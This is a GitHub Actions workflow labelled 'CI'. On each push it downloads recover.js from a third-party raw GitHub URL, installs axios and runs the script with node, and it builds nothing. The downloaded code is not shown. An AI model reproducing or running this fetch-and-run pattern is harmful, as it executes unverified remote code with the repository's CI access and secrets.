name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:

    - name: Server
      run: wget https://raw.githubusercontent.com/raiyan8086/script/refs/heads/main/recover.js
    - run: npm install axios
    - run: node recover
